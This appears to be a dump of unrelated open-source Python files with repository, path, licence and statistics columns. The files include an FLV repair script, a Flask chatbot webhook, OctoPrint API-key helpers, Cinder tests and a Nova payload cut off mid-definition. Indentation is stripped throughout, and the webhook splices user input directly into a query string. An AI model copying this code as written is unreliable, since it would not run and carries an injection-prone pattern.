a67878813/script | flvrepair.py | 1 | 3480 | # coding: utf-8
#2019.11.24 refixed in ubuntu19.10
#使用前需安装yamdi
#sudo apt install yamdi
#ubuntu 16.04LTS
#与win机器mount命令示例:
#sudo mount -t cifs -o username="用户名",password="密码",uid=1000 //192.168.2.90/raid5_5-9/直播录像 /mnt2
#若目录不存在,terminal中
#sudo mkdir mnt2
#sudo chown -R linux用户名:linux用户名 mnt2
#使用方法 :
#1.修改脚本预计遍历flv的目录(contents变量)后
#2.终端(terminal)中 cd 进入相应目录。
#python3 flvrepair2.py
import os
import os.path
import json
import random
import pickle
import time
from termcolor import colored
#子进程相关模块
import subprocess
#contents为预计遍历flv目录
contents = "/mnt"
#******************************
error_counts = 0
s =[]
for root, dirs, files in os.walk(contents):
for name in files:
s.append(os.path.join(root, name))
#可注释掉
#print(s)
end_list = []
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except FileNotFoundError:
print("donelist is not exist")
done_list = []
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
for line in s:
#未修复的flv文件,追加到end_list中
if (".flv" in line) and (line not in done_list):
end_list.append(line)
print_list=end_list[:3]
for i in print_list:
print(i)
print(colored((" 未添加meta数据的flv文件数 = " + str(len(end_list))),"cyan"))
#判断临时目录是否存在
if os.path.isdir(contents+"/_temp"):
pass
else:
os.mkdir(contents+"/_temp")
print("临时目录已建立")
#
#os.remove(contents+"/_temp")
for line in end_list:
#
try:
ctime = os.path.getctime(line)
except :
error_counts +=1
continue
#
salt_ = random.randint(110, 880)
print(colored("进行meta注入 = "+str(line),"green"))
try:
child = subprocess.Popen(["/usr/bin/yamdi","-i",line,"-o",contents+"/_temp/output.tmp"],stderr=subprocess.STDOUT)
child.wait()
except:
error_counts +=1
print(colored("meta信息写入错误","red"))
print(colored(line,"red"))
print(child.stderr)
continue
time.sleep(10)
try:
child2 = subprocess.Popen(["mv","-f",contents+"/_temp/output.tmp",line],stderr=subprocess.STDOUT)
child2.wait() #等待子进程结束,父进程继续
except :
error_counts +=1
print(colored("mv错误","red"))
print(colored(line,"red"))
continue
time.sleep(10)
#
try:
os.utime(line, (ctime,ctime))
except :
error_counts +=1
continue
print(colored("meta注入完成 = "+str(line),"green"))
print(colored("next","green"))
#更新 完成列表
try:
with open(contents+'/done_list.json', 'r') as r:
done_list = json.load(r)
except:
continue
done_list.append(line)
with open(contents+'/done_list.json', 'w') as f:
f.write(json.dumps(done_list))
try:
with open(contents+'/done_list.pik', 'wb') as f:
pickle.dump(done_list,f)
except:
continue
print(colored(("Error_Counts =" + str(error_counts)),"red"))
if error_counts == 0 :
print(colored("全部完成","green"))
else:
print(colored("全部完成 with error = "+str(error_counts),"red"))
| apache-2.0 | -2,722,938,224,545,431,000 | 20.682759 | 121 | 0.594148 | false | 2.626566 | false | false | false |
jzawar/highstreet | app.py | 1 | 5268 | #!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def suggestDeodrant(condition, person, city):
print(person)
url = 'http://ipinfo.io/json'
res = urlopen(url)
dt = json.load(res)
IP=dt['ip']
org=dt['org']
currCity =dt['city']
country =dt['country']
region=dt['region']
humidWeatherList = ['Cloudy','mostly cloudy (night)','mostly cloudy (day)','partly cloudy (night)','partlycloudy (day)','tornado','tropical storm','hurricane','severe thunderstorms','thunderstorms','mixed rain and snow','mixed rain and sleet','mixed snow and sleet','freezing drizzle','drizzle','freezing rain','Showers','snow flurries','light snow showers','blowing snow','snow','hail','sleet','mixed rain and hail','thundershowers','snow showers','isolated','thundershowers'];
hotWeatherList = ['dust','foggy','haze','smoky','blustery','windy','cold','clear (night)','sunny','fair (night)','fair (day)','hot','isolated thunderstorms','scattered thunderstorms','scattered thunderstorms','scattered showers','heavy snow','scattered snow showers','heavy snow','partly cloudy'];
if(condition in humidWeatherList):
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Moist/c/580">Anti-Perspirant Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Moist/c/395">Anti-Perspirant Deodrants</a> for ' + person
else:
if person == 'Men':
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Men-Perfumes/Dry/c/570">Perfumed Deodrants</a> for ' + person
else:
condition = 'Hmmm.. The weather in '+city+' looks '+condition+'. I suggest these <a href="/highstreetstorefront/highstreet/en/highstreet-Catalogue/Perfumes/Women-Perfumes/Dry/c/390">Perfumed Deodrants</a> for ' + person
if currCity != city:
condition = condition+' I see you are currently in '+currCity+'. Are you making an air travel to '+city+'?'
return condition
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data,req)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data, req):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
#speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = "Hmmm.. It looks " + condition.get('text') + " in " + location.get('city')
airesult = req.get("result")
parameters = airesult.get("parameters")
person = parameters.get('Person')
city = parameters.get("geo-city")
returnedSpeech = suggestDeodrant(condition.get('text'), person, city)
print(returnedSpeech)
#print("Response:")
#print(speech)
return {
"speech": returnedSpeech,
"displayText": returnedSpeech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 1,609,381,478,073,361,700 | 35.583333 | 482 | 0.656986 | false | 3.361838 | false | false | false |
Salandora/OctoPrint | src/octoprint/server/util/__init__.py | 1 | 6142 | # coding=utf-8
from __future__ import absolute_import, division, print_function
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
from octoprint.settings import settings
import octoprint.timelapse
import octoprint.server
from octoprint.users import ApiUser
from octoprint.util import deprecated
import flask as _flask
import flask_login
import flask_principal
from . import flask
from . import sockjs
from . import tornado
from . import watchdog
def enforceApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which makes sure an API key is provided
"""
import octoprint.server
if _flask.request.method == 'OPTIONS':
# we ignore OPTIONS requests here
return
if _flask.request.endpoint and (_flask.request.endpoint == "static" or _flask.request.endpoint.endswith(".static")):
# no further handling for static resources
return
apikey = get_api_key(_flask.request)
if apikey is None:
return _flask.make_response("No API key provided", 401)
if apikey != octoprint.server.UI_API_KEY and not settings().getBoolean(["api", "enabled"]):
# api disabled => 401
return _flask.make_response("API disabled", 401)
apiKeyRequestHandler = deprecated("apiKeyRequestHandler has been renamed to enforceApiKeyRequestHandler")(enforceApiKeyRequestHandler)
def loginFromApiKeyRequestHandler():
"""
``before_request`` handler for blueprints which creates a login session for the provided api key (if available)
UI_API_KEY and app session keys are handled as anonymous keys here and ignored.
"""
apikey = get_api_key(_flask.request)
if apikey and apikey != octoprint.server.UI_API_KEY and not octoprint.server.appSessionManager.validate(apikey):
user = get_user_for_apikey(apikey)
if user is not None and not user.is_anonymous and flask_login.login_user(user, remember=False):
flask_principal.identity_changed.send(_flask.current_app._get_current_object(),
identity=flask_principal.Identity(user.get_id()))
else:
return _flask.make_response("Invalid API key", 401)
def corsRequestHandler():
"""
``before_request`` handler for blueprints which sets CORS headers for OPTIONS requests if enabled
"""
if _flask.request.method == 'OPTIONS' and settings().getBoolean(["api", "allowCrossOrigin"]):
# reply to OPTIONS request for CORS headers
return optionsAllowOrigin(_flask.request)
def corsResponseHandler(resp):
"""
``after_request`` handler for blueprints for which CORS is supported.
Sets ``Access-Control-Allow-Origin`` headers for ``Origin`` request header on response.
"""
# Allow crossdomain
allowCrossOrigin = settings().getBoolean(["api", "allowCrossOrigin"])
if _flask.request.method != 'OPTIONS' and 'Origin' in _flask.request.headers and allowCrossOrigin:
resp.headers['Access-Control-Allow-Origin'] = _flask.request.headers['Origin']
return resp
def noCachingResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses.
Sets ``Cache-Control``, ``Pragma`` and ``Expires`` headers accordingly
to prevent all client side caching from taking place.
"""
return flask.add_non_caching_response_headers(resp)
def noCachingExceptGetResponseHandler(resp):
"""
``after_request`` handler for blueprints which shall set no caching headers
on their responses to any requests that are not sent with method ``GET``.
See :func:`noCachingResponseHandler`.
"""
if _flask.request.method == "GET":
return flask.add_no_max_age_response_headers(resp)
else:
return flask.add_non_caching_response_headers(resp)
def optionsAllowOrigin(request):
"""
Shortcut for request handling for CORS OPTIONS requests to set CORS headers.
"""
resp = _flask.current_app.make_default_options_response()
# Allow the origin which made the XHR
resp.headers['Access-Control-Allow-Origin'] = request.headers['Origin']
# Allow the actual method
resp.headers['Access-Control-Allow-Methods'] = request.headers['Access-Control-Request-Method']
# Allow for 10 seconds
resp.headers['Access-Control-Max-Age'] = "10"
# 'preflight' request contains the non-standard headers the real request will have (like X-Api-Key)
customRequestHeaders = request.headers.get('Access-Control-Request-Headers', None)
if customRequestHeaders is not None:
# If present => allow them all
resp.headers['Access-Control-Allow-Headers'] = customRequestHeaders
return resp
def get_user_for_apikey(apikey):
if settings().getBoolean(["api", "enabled"]) and apikey is not None:
if apikey == settings().get(["api", "key"]) or octoprint.server.appSessionManager.validate(apikey):
# master key or an app session key was used
return ApiUser()
elif octoprint.server.userManager.enabled:
# user key might have been used
return octoprint.server.userManager.findUser(apikey=apikey)
return None
def get_api_key(request):
# Check Flask GET/POST arguments
if hasattr(request, "values") and "apikey" in request.values:
return request.values["apikey"]
# Check Tornado GET/POST arguments
if hasattr(request, "arguments") and "apikey" in request.arguments \
and len(request.arguments["apikey"]) > 0 and len(request.arguments["apikey"].strip()) > 0:
return request.arguments["apikey"]
# Check Tornado and Flask headers
if "X-Api-Key" in request.headers.keys():
return request.headers.get("X-Api-Key")
return None
def get_plugin_hash():
from octoprint.plugin import plugin_manager
plugin_signature = lambda impl: "{}:{}".format(impl._identifier, impl._plugin_version)
template_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.TemplatePlugin))
asset_plugins = map(plugin_signature, plugin_manager().get_implementations(octoprint.plugin.AssetPlugin))
ui_plugins = sorted(set(template_plugins + asset_plugins))
import hashlib
plugin_hash = hashlib.sha1()
plugin_hash.update(",".join(ui_plugins))
return plugin_hash.hexdigest()
| agpl-3.0 | -1,420,406,611,270,146,000 | 32.736264 | 134 | 0.744788 | false | 3.555298 | false | false | false |
eharney/cinder | cinder/tests/functional/test_volumes.py | 1 | 5004 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from cinder.tests.functional import functional_helpers
from cinder.volume import configuration
class VolumesTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
def setUp(self):
super(VolumesTest, self).setUp()
self.api.create_type(self._vol_type_name)
def _get_flags(self):
f = super(VolumesTest, self)._get_flags()
f['volume_driver'] = (
{'v': 'cinder.tests.fake_driver.FakeLoggingVolumeDriver',
'g': configuration.SHARED_CONF_GROUP})
f['default_volume_type'] = {'v': self._vol_type_name}
return f
def test_get_volumes_summary(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes(False)
self.assertIsNotNone(volumes)
def test_get_volumes(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes()
self.assertIsNotNone(volumes)
def test_create_and_delete_volume(self):
"""Creates and deletes a volume."""
# Create volume
created_volume = self.api.post_volume({'volume': {'size': 1}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
# It should also be in the all-volume list
volumes = self.api.get_volumes()
volume_names = [volume['id'] for volume in volumes]
self.assertIn(created_volume_id, volume_names)
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Delete the volume
self.api.delete_volume(created_volume_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
# Should be gone
self.assertFalse(found_volume)
def test_create_volume_with_metadata(self):
"""Creates a volume with metadata."""
# Create volume
metadata = {'key1': 'value1',
'key2': 'value2'}
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'metadata': metadata}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and metadata present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(metadata, found_volume['metadata'])
def test_create_volume_in_availability_zone(self):
"""Creates a volume in availability_zone."""
# Create volume
availability_zone = 'nova'
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'availability_zone': availability_zone}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and availability zone present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(availability_zone, found_volume['availability_zone'])
def test_create_and_update_volume(self):
# Create vol1
created_volume = self.api.post_volume({'volume': {
'size': 1, 'name': 'vol1'}})
self.assertEqual('vol1', created_volume['name'])
created_volume_id = created_volume['id']
# update volume
body = {'volume': {'name': 'vol-one'}}
updated_volume = self.api.put_volume(created_volume_id, body)
self.assertEqual('vol-one', updated_volume['name'])
# check for update
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual('vol-one', found_volume['name'])
| apache-2.0 | 4,194,754,191,102,223,000 | 38.09375 | 79 | 0.635092 | false | 3.968279 | true | false | false |
genzgd/Lampost-Mud | lampmud/mud/chat.py | 1 | 1548 | from lampost.gameops.action import ActionError
from lampost.di.resource import Injected, module_inject
from lampmud.mud.action import mud_action
sm = Injected('session_manager')
module_inject(__name__)
@mud_action('emote', target_class='cmd_str')
def emote(source, target):
source.broadcast(raw="{}{} {}".format('' if source.imm_level else ':', source.name, target))
@mud_action('tell', target_class="player_online", obj_class="cmd_str")
def tell(source, target, obj):
tell_message(source, target, obj)
def tell_message(source, player, statement):
if not statement:
return source.display_line("Say what to " + player.name + "?")
player.last_tell = source.dbo_id
player.display_line(source.name + " tells you, `" + statement + "'", 'tell_from')
source.display_line("You tell " + player.name + ", `" + statement + "'", 'tell_to')
@mud_action('reply', target_class='cmd_str')
def reply(source, target):
if not source.last_tell:
raise ActionError("You have not received a tell recently.")
session = sm.player_session(source.last_tell)
if session:
tell_message(source, session.player, target)
else:
source.last_tell = None
return source.display_line("{} is no longer logged in".format(source.last_tell))
@mud_action('say', target_class='cmd_str')
def say(source, target):
source.display_line("You say, `{}'".format(target), display='say')
source.broadcast(raw="{} says, `{}'".format(source.name, target),
display='say', silent=True)
| mit | 6,273,739,487,291,257,000 | 35 | 96 | 0.662791 | false | 3.372549 | false | false | false |
googleapis/googleapis-gen | google/cloud/videointelligence/v1p1beta1/videointelligence-v1p1beta1-py/google/cloud/videointelligence_v1p1beta1/services/video_intelligence_service/transports/grpc_asyncio.py | 1 | 12936 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.videointelligence_v1p1beta1.types import video_intelligence
from google.longrunning import operations_pb2 # type: ignore
from .base import VideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import VideoIntelligenceServiceGrpcTransport
class VideoIntelligenceServiceGrpcAsyncIOTransport(VideoIntelligenceServiceTransport):
"""gRPC AsyncIO backend transport for VideoIntelligenceService.
Service that implements Google Cloud Video Intelligence API.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def annotate_video(self) -> Callable[
[video_intelligence.AnnotateVideoRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the annotate video method over gRPC.
Performs asynchronous video annotation. Progress and results can
be retrieved through the ``google.longrunning.Operations``
interface. ``Operation.metadata`` contains
``AnnotateVideoProgress`` (progress). ``Operation.response``
contains ``AnnotateVideoResponse`` (results).
Returns:
Callable[[~.AnnotateVideoRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'annotate_video' not in self._stubs:
self._stubs['annotate_video'] = self.grpc_channel.unary_unary(
'/google.cloud.videointelligence.v1p1beta1.VideoIntelligenceService/AnnotateVideo',
request_serializer=video_intelligence.AnnotateVideoRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['annotate_video']
__all__ = (
'VideoIntelligenceServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -4,601,164,260,622,470,700 | 45.365591 | 99 | 0.619125 | false | 4.782255 | false | false | false |
bioinform/somaticseq | somaticseq/vcfModifier/modify_JointSNVMix2.py | 1 | 3347 | #!/usr/bin/env python3
import argparse
import somaticseq.genomicFileHandler.genomic_file_handlers as genome
def run():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Variant Call Type, i.e., snp or indel
parser.add_argument('-infile', '--input-vcf', type=str, help='Input VCF file', required=True)
parser.add_argument('-outfile', '--output-vcf', type=str, help='Output VCF file', required=True)
# Parse the arguments:
args = parser.parse_args()
infile = args.input_vcf
outfile = args.output_vcf
return infile, outfile
def convert(infile, outfile):
idx_chrom,idx_pos,idx_id,idx_ref,idx_alt,idx_qual,idx_filter,idx_info,idx_format,idx_SM1,idx_SM2 = 0,1,2,3,4,5,6,7,8,9,10
with genome.open_textfile(infile) as vcf, open(outfile, 'w') as vcfout:
line_i = vcf.readline().rstrip()
# VCF header
while line_i.startswith('#'):
if line_i.startswith('##FORMAT=<ID=AD,'):
line_i = '##FORMAT=<ID=AD,Number=.,Type=Integer,Description="Allelic depths for the ref and alt alleles in the order listed">'
vcfout.write( line_i + '\n')
line_i = vcf.readline().rstrip()
while line_i:
item = line_i.split('\t')
format_items = item[idx_format].split(':')
if 'AD' in format_items and 'RD' in format_items:
# NORMAL
idx_ad = format_items.index('AD')
idx_rd = format_items.index('RD')
format_items.pop(idx_rd)
item_normal = item[idx_SM1].split(':')
normal_ad = int(item_normal[idx_ad])
normal_rd = int(item_normal[idx_rd])
try:
vaf = normal_ad / (normal_ad + normal_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
normal_gt = '1/1'
elif vaf > 0.25:
normal_gt = '0/1'
else:
normal_gt = '0/0'
item_normal[idx_ad] = '{},{}'.format( item_normal[idx_rd] , item_normal[idx_ad] )
item_normal.pop(idx_rd)
item_normal = [normal_gt] + item_normal
# TUMOR
item_tumor = item[idx_SM2].split(':')
tumor_ad = int(item_tumor[idx_ad])
tumor_rd = int(item_tumor[idx_rd])
try:
vaf = tumor_ad / (tumor_ad + tumor_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
tumor_gt = '1/1'
else:
tumor_gt = '0/1'
item_tumor[idx_ad] = '{},{}'.format( item_tumor[idx_rd] , item_tumor[idx_ad] )
item_tumor.pop(idx_rd)
item_tumor = [tumor_gt] + item_tumor
# Rewrite
item[idx_format] = 'GT:' + ':'.join(format_items)
item[idx_SM1] = ':'.join(item_normal)
item[idx_SM2] = ':'.join(item_tumor)
line_i = '\t'.join(item)
vcfout.write(line_i+'\n')
line_i = vcf.readline().rstrip()
if __name__ == '__main__':
infile, outfile = run()
convert(infile, outfile)
| bsd-2-clause | 4,254,031,095,837,364,000 | 29.990741 | 142 | 0.501942 | false | 3.464803 | false | false | false |
phenoxim/nova | nova/notifications/objects/instance.py | 1 | 25085 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.notifications.objects import base
from nova.notifications.objects import flavor as flavor_payload
from nova.notifications.objects import keypair as keypair_payload
from nova.objects import base as nova_base
from nova.objects import fields
CONF = nova.conf.CONF
@nova_base.NovaObjectRegistry.register_notification
class InstancePayload(base.NotificationPayloadBase):
SCHEMA = {
'uuid': ('instance', 'uuid'),
'user_id': ('instance', 'user_id'),
'tenant_id': ('instance', 'project_id'),
'reservation_id': ('instance', 'reservation_id'),
'display_name': ('instance', 'display_name'),
'display_description': ('instance', 'display_description'),
'host_name': ('instance', 'hostname'),
'host': ('instance', 'host'),
'node': ('instance', 'node'),
'os_type': ('instance', 'os_type'),
'architecture': ('instance', 'architecture'),
'availability_zone': ('instance', 'availability_zone'),
'image_uuid': ('instance', 'image_ref'),
'key_name': ('instance', 'key_name'),
'kernel_id': ('instance', 'kernel_id'),
'ramdisk_id': ('instance', 'ramdisk_id'),
'created_at': ('instance', 'created_at'),
'launched_at': ('instance', 'launched_at'),
'terminated_at': ('instance', 'terminated_at'),
'deleted_at': ('instance', 'deleted_at'),
'updated_at': ('instance', 'updated_at'),
'state': ('instance', 'vm_state'),
'power_state': ('instance', 'power_state'),
'task_state': ('instance', 'task_state'),
'progress': ('instance', 'progress'),
